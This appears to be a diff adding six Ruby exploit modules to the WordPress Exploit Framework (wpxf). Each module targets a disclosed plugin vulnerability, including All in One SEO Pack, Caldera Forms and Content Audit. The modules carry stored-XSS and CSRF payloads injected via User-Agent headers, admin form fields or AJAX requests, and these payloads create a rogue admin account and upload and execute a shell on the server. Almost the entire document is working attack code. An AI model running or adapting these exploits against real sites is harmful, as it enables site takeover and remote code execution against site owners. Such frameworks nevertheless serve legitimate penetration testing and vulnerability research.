wpxf 2.0.0a

data/lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb

@@ -0,0 +1,208 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::AllInOneSeoPackXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'All in One SEO Pack <= 2.3.6.1 Stored XSS Shell Upload',
+      desc: %(
+              This module exploits a lack of HTTP header sanitization in
+              versions <= 2.3.6.1 of the All in One SEO Pack plugin which
+              allows unauthenticated users to store a script that will
+              create a new admin user and use the new credentials to upload
+              and execute a payload when an admin views the blocked bot logs.
+            ).strip,
+      author: [
+        'David Vaartjes', # Disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8538'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html']
+      ],
+      date: 'Jul 10 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('all-in-one-seo-pack', '2.3.6.2')
+  end
+
+  def blocked_bots
+    [
+      'Abonti',
+      'aggregator',
+      'AhrefsBot',
+      'asterias',
+      'BDCbot',
+      'BLEXBot',
+      'BuiltBotTough',
+      'Bullseye',
+      'BunnySlippers',
+      'ca-crawler',
+      'CCBot',
+      'Cegbfeieh',
+      'CheeseBot',
+      'CherryPicker',
+      'CopyRightCheck',
+      'cosmos',
+      'Crescent',
+      'discobot',
+      'DittoSpyder',
+      'DotBot',
+      'Download Ninja',
+      'EasouSpider',
+      'EmailCollector',
+      'EmailSiphon',
+      'EmailWolf',
+      'EroCrawler',
+      'Exabot',
+      'ExtractorPro',
+      'Fasterfox',
+      'FeedBooster',
+      'Foobot',
+      'Genieo',
+      'grub-client',
+      'Harvest',
+      'hloader',
+      'httplib',
+      'HTTrack',
+      'humanlinks',
+      'ieautodiscovery',
+      'InfoNaviRobot',
+      'IstellaBot',
+      'Java/1.',
+      'JennyBot',
+      'k2spider',
+      'Kenjin Spider',
+      'Keyword Density/0.9',
+      'larbin',
+      'LexiBot',
+      'libWeb',
+      'libwww',
+      'LinkextractorPro',
+      'linko',
+      'LinkScan/8.1a Unix',
+      'LinkWalker',
+      'LNSpiderguy',
+      'lwp-trivial',
+      'magpie',
+      'Mata Hari',
+      'MaxPointCrawler',
+      'MegaIndex',
+      'Microsoft URL Control',
+      'MIIxpc',
+      'Mippin',
+      'Missigua Locator',
+      'Mister PiX',
+      'MJ12bot',
+      'moget',
+      'MSIECrawler',
+      'NetAnts',
+      'NICErsPRO',
+      'Niki-Bot',
+      'NPBot',
+      'Nutch',
+      'Offline Explorer',
+      'Openfind',
+      'panscient.com',
+      'PHP/5.{',
+      'ProPowerBot/2.14',
+      'ProWebWalker',
+      'Python-urllib',
+      'QueryN Metasearch',
+      'RepoMonkey',
+      'RMA',
+      'SemrushBot',
+      'SeznamBot',
+      'SISTRIX',
+      'sitecheck.Internetseer.com',
+      'SiteSnagger',
+      'SnapPreviewBot',
+      'Sogou',
+      'SpankBot',
+      'spanner',
+      'spbot',
+      'Spinn3r',
+      'suzuran',
+      'Szukacz/1.4',
+      'Teleport',
+      'Telesoft',
+      'The Intraformant',
+      'TheNomad',
+      'TightTwatBot',
+      'Titan',
+      'toCrawl/UrlDispatcher',
+      'True_Robot',
+      'turingos',
+      'TurnitinBot',
+      'UbiCrawler',
+      'UnisterBot',
+      'URLy Warning',
+      'VCI',
+      'WBSearchBot',
+      'Web Downloader/6.9',
+      'Web Image Collector',
+      'WebAuto',
+      'WebBandit',
+      'WebCopier',
+      'WebEnhancer',
+      'WebmasterWorldForumBot',
+      'WebReaper',
+      'WebSauger',
+      'Website Quester',
+      'Webster Pro',
+      'WebStripper',
+      'WebZip',
+      'Wotbox',
+      'wsr-agent',
+      'WWW-Collector-E',
+      'Xenu',
+      'Zao',
+      'Zeus',
+      'ZyBORG',
+      'coccoc',
+      'Incutio',
+      'lmspider',
+      'memoryBot',
+      'SemrushBot',
+      'serf',
+      'Unknown',
+      'uptime files'
+    ]
+  end
+
+  def store_script
+    emit_info 'Storing script...'
+    res = execute_get_request(
+      url: full_uri,
+      headers: {
+        'User-Agent' => "#{blocked_bots.sample}<script>#{xss_ascii_encoded_include_script}</script>"
+      }
+    )
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 503
+      emit_warning "Server responded with code #{res.code}, expected 503"
+    end
+
+    true
+  end
+
+  def run
+    return false unless super
+    return false unless store_script
+
+    emit_success 'Script stored and will be executed when a user views the blocked bots log'
+    start_http_server
+
+    xss_shell_success
+  end
+end

data/lib/wpxf/modules/exploit/xss/stored/alo_easymail_csrf_xss_shell_upload.rb

@@ -0,0 +1,48 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::AloEasymailCsrfXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'ALO EasyMail Newsletter <= 2.6.01 CSRF XSS Shell Upload',
+      author: [
+        'Mohsen Lotfi', # Discovery and disclosure
+        'rastating'     # WPXF module
+      ],
+      desc: 'This module prepares a payload and link that can be sent '\
+            'to an admin user which when visited with a valid session '\
+            'will store a script in the ALO EasyMail admin settings page '\
+            'which when visited will create a new admin user which will be '\
+            'used to upload and execute the selected payload in the context '\
+            'of the web server.',
+      references: [
+        ['WPVDB', '8392'],
+        ['EDB', '39451']
+      ],
+      date: 'Feb 16 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('alo-easymail', '2.7')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{normalize_uri(wordpress_url_admin, 'edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php')}', {
+        listname_en: "<script>#{xss_ascii_encoded_include_script}<\\/script>",
+        elp_list_available: 'hidden',
+        elp_list_order: '0',
+        user_ID: '1',
+        task: 'save_list',
+        list_id: '',
+        submit_list: 'Save'
+      });
+    </script></body></html>
+    |
+  end
+end

data/lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb

@@ -0,0 +1,41 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::AppointmentScheduleBookingSystemStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StoredXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Appointment Schedule Booking System Unauthenticated Stored XSS Shell Upload',
+      author: [
+        'White Fir Design', # Disclosure
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8634'],
+        ['URL', 'https://www.pluginvulnerabilities.com/2016/10/03/persistent-cross-site-scripting-xss-vulnerability-in-wordpress-appointment-schedule-booking-system/']
+      ],
+      date: 'Oct 04 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-appointment-schedule-booking-system', '1.1')
+  end
+
+  def vulnerable_page
+    'the page containing the appointment schedule'
+  end
+
+  def store_script
+    execute_post_request(
+      url: wordpress_url_admin_ajax,
+      body: {
+        'action' => 'appointgen_save_cssfixfront',
+        'cssfix' => 'front',
+        'css' => "</style></style><script>#{xss_include_script}</script><style>"
+      }
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb

@@ -0,0 +1,39 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::ArabicFontCsrfStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload',
+      author: [
+        'rastating'  # Discovery + WPXF module
+      ],
+      references: [
+        ['WPVDB', '8868'],
+        ['URL', 'https://www.rastating.com/arabic-font-1-2-csrf-stored-xss']
+      ],
+      date: 'Jul 18 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('arabic-font', '1.2.1')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      normalize_uri(wordpress_url_admin, 'admin.php?page=arabic-font%2Finc%2Finit.php'),
+      'save1'              => 'Save changes',
+      'AF_fontfamily'      => 'JF Flat Jozoor',
+      'AF_fontsize'        => '18',
+      'AF_lineheight'      => '45',
+      'AF_textalign'       => 'Center',
+      'AF_defaultcssclass' => ".arab\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input+type=\\\"hidden\\\"+value=\\\"",
+      'AF_customcss'       => '',
+      'action'             => 'save'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/stored/caldera_forms_stored_xss_shell_upload.rb

@@ -0,0 +1,38 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::CalderaFormsStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Caldera Forms <= 1.3.5.3 Stored XSS Shell Upload',
+      author: [
+        'Jurgen Kloosterman', # Disclosure
+        'rastating'           # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8650'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_caldera_forms_wordpress_plugin.html']
+      ],
+      date: 'Nov 08 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('caldera-forms', '1.3.5.4')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      wordpress_url_admin_ajax,
+      'before'          => 'serialize_modal_form',
+      'data'            => "name=%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E",
+      'template'        => '0',
+      'callback'        => 'new_form_redirect',
+      'modalAutoclose'  => 'new_form',
+      'action'          => 'create_form'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb

@@ -0,0 +1,83 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::ContentAuditCsrfStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Content Audit <= 1.9.1 CSRF Stored XSS Shell Upload',
+      desc: %(
+        Versions up to and including 1.9.1 of the Content Audit plugin suffer
+        from a CSRF and encoding issue, allowing for a JavaScript payload to
+        be stored in the notes against a page.
+
+        This module will create a link, which when clicked by an admin, will
+        store the payload against all auditable items with an ID in the specified
+        range. By default, Content Audit ships with only pages audited, but posts
+        can also be audited. The payload will be executed the next time an admin
+        views the page / post management area, with one of the infected items
+        visible in the list.
+
+        Note: If a specified post ID has not been yet assigned a post / page, the
+        payload will be stored and executed when the ID is eventually assigned to
+        a new post / page.
+      ),
+      desc_preformatted: true,
+      author: [
+        'Tom Adams', # Disclosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8915'],
+        ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/73'],
+        ['URL', 'https://security.dxw.com/advisories/csrf-xss-content-audit/']
+      ],
+      date: 'Aug 21 2017'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'first_post_id',
+        desc: 'The first post ID to store the payload against',
+        required: true,
+        default: 1
+      ),
+      IntegerOption.new(
+        name: 'last_post_id',
+        desc: 'The last post ID to store the payload against',
+        required: true,
+        default: 100
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('content-audit', '1.9.2')
+  end
+
+  def vulnerable_url
+    wordpress_url_admin_ajax
+  end
+
+  def first_post_id
+    normalized_option_value('first_post_id')
+  end
+
+  def last_post_id
+    normalized_option_value('last_post_id')
+  end
+
+  def initial_script
+    fields = {
+      'action'                         => 'content_audit_save_bulk_edit',
+      '_content_audit_owner'           => Utility::Text.rand_alphanumeric(10),
+      '_content_audit_expiration_date' => (Date.today + 7).strftime('%Y-%m-%d'),
+      '_content_audit_notes'           => "<script>#{xss_ascii_encoded_include_script}<\\/script>"
+    }
+
+    Array(first_post_id..last_post_id).each_with_index { |id, index| fields["post_ids[#{index}]"] = id }
+    create_basic_post_script vulnerable_url, fields
+  end
+end